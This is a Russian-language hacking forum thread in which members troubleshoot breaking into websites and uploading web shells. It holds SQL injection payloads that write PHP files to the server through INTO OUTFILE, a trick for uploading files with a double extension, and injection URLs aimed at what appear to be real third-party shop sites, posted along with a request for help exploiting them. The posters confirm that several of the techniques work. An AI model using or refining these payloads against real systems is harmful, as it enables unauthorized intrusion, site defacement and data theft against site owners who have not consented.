Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. namez2

    namez2 New Member

    Joined:
    23 Aug 2010
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    подскажите как залить шел. если при залитии картинкой он переименовывается
     
  2. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    как переименовывается? и как ты заливаешь?
    что за cms?
     
    _________________________
    1 person likes this.
  3. namez2

    namez2 New Member

    Joined:
    23 Aug 2010
    Messages:
    45
    Likes Received:
    1
    Reputations:
    0
    видимо самописная. заливаю name.php.jpg пишет что залился но судя по всему уже получается newname.jpg и открываться не хотит...
     
  4. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Через такую систему думаю никак, т.к она сама потом переименовывает независимо от того, какое название. Но, возможно, есть функция "переименовать" и т.п ;)
     
  5. snet

    snet New Member

    Joined:
    19 Dec 2010
    Messages:
    61
    Likes Received:
    2
    Reputations:
    0
    Не получается залить шел. Хотя путь к директории сайта знаю и привилегия на файл mysql пользователя YES. Может прав нет к папке www? как действовать?
     
  6. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    для начала нужно показать нам как именно ты пытаешься это сделать.
     
  7. snet

    snet New Member

    Joined:
    19 Dec 2010
    Messages:
    61
    Likes Received:
    2
    Reputations:
    0
    Через скуль инъекцию в пост запросе.
    Code:
    1' and (select 1 from(select count(*),concat((SELECT "<?php phpinfo(); ?>" INTO OUTFILE "/адрес/файл.php"),floor(rand(0)*2  ))x from information_schema.tables group by x)a); -- 
     
  8. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    через еррор-бейсед нельзя залить шелл
     
    _________________________
    2 people like this.
  9. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Code:
    https://ventosavineyardscom.terrasite.com/cart.asp?Add=1+and%201=%28select%20top%201%20table_name%20from%20information.schema.tables%20where%20Table_name%20not%20in%20%28%27Events%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27,%27schema%27%29%29
    No admin table?

    Always this error:

    Code:
    Incorrect syntax near the keyword 'schema'.
    Only schema showing, why?
     
  10. snet

    snet New Member

    Joined:
    19 Dec 2010
    Messages:
    61
    Likes Received:
    2
    Reputations:
    0
    no information.schema, information_schema must.
    sorry for my english
     
    #18730 snet, 23 Dec 2011
    Last edited: 23 Dec 2011
  11. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    :)

    Вы наверное сейчас опять скажете что я не понял поста, ну да бог с ним

    Ерор бейс это просто название, причём не самой скули, а варианта её эксплуатации .

    А шелл залить можно везде где есть возможность сделать подзапрос (и даже без него). Просто навороты лишние ни к чему в запросе.

    snet
     
    1 person likes this.
  12. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Code:
    select user from mysql.user where [B]1 and (select 1 into outfile '/tmp/test.txt' lines terminated by "<?php lalalalala; ?>")--+[/B]
    #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile '/tmp/test.txt' lines terminated by "<?php lalalalala; ?>")--' at line 1

    Не вводи в заблуждение пользователей, и прежде чем ответить на вопрос, будь добр протестируй это где-нибудь.
     
    _________________________
    #18732 Expl0ited, 23 Dec 2011
    Last edited: 23 Dec 2011
    1 person likes this.
  13. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Ну если МОА не видит что ошибка СИНТАКСИСА, тут я бессилен :)

    Запрос рабочий, если всё сделать правильно
     
  14. snet

    snet New Member

    Joined:
    19 Dec 2010
    Messages:
    61
    Likes Received:
    2
    Reputations:
    0
    Да все норм, вывела ошибка:
    Code:
    Can't create/write to file '/адрес/файл.php' (Errcode: 13)
    
    Осталось найти папку где есть права.
    Спасибо вам обоим.

    lightangel, "Thank you" does not smudge on bread. Give me a plus for the reputation:)
     
    #18734 snet, 23 Dec 2011
    Last edited: 23 Dec 2011
  15. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Thank you Snet, worked properly.
     
  16. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Ух. В случае snet, всё элементарно, результат первого запроса, попадает во второй запрос, почему и невозможно раскрутить скуль обычным способом, и приходится использовать вывод в ошибке. Но для залития шелла, достаточно выполнить запрос:
    SELECT column FROM table WHERE columns = false UNION SELECT 'test' INTO OUTFILE '/tmp/file.txt'
    и при условии если директория доступна на запись для пользователя mysql, то первый запрос выполнится, файл успешно создастся.

    Но в примере уважаемого пользователя KolosJey, ничего не получится, т.к. в данном подзапросе and (select 1 into outfile '/tmp/test.txt' lines terminated by "text") использование INTO OUTFILE нарушает синтаксис запроса, о чем и свидетельствует ошибка:
    #1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'into outfile

    Ну если ОБЫЧНЫЕ ПОЛЬЗОВАТЕЛИ не научатся думать СВОЕЙ головой, тут я бессилен.
     
    _________________________
    #18736 Expl0ited, 23 Dec 2011
    Last edited: 23 Dec 2011
    1 person likes this.
  17. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Я бы даже сказал, варианта вывода на экран результата запроса. Если запрос направлен не на получение информации, а на внесение изменений (в файлы или базу), то без разницы, блайнд или нет.


    Людям свойственно иногда ошибаться. Мы же не роботы.
    "через еррор-бейсед нельзя залить шелл" (c) Expl0ited
    :)
     
  18. snet

    snet New Member

    Joined:
    19 Dec 2010
    Messages:
    61
    Likes Received:
    2
    Reputations:
    0
    Спасибо что так суетитесь из-за моей проблемы:)
    Действительно, вы оба правы. Можно было обычным способом отправить запрос:
    union select 1,2,3,4,"blabla" into outfile "/asd", .
    это 3 часовое ковыряние через error_base мне запудрило всю голову и я, почему-то, ограничил себя только им.
    Но и вариант который привел КолосДжей тоже сработал. Записал его в свой справочник. Очень познавательно.
     
  19. lightangel

    lightangel New Member

    Joined:
    7 Nov 2011
    Messages:
    91
    Likes Received:
    3
    Reputations:
    -6
    Is there a way to inject this?

    Code:
    http://www.sheltonhitch.com/prodlist.asp?catId=1074%27%20having%201=1
    Nothing is working for me.
     
  20. Boolean

    Boolean Elder - Старейшина

    Joined:
    5 Sep 2010
    Messages:
    147
    Likes Received:
    83
    Reputations:
    78
    Читай мануалы.
     
Thread Status:
Not open for further replies.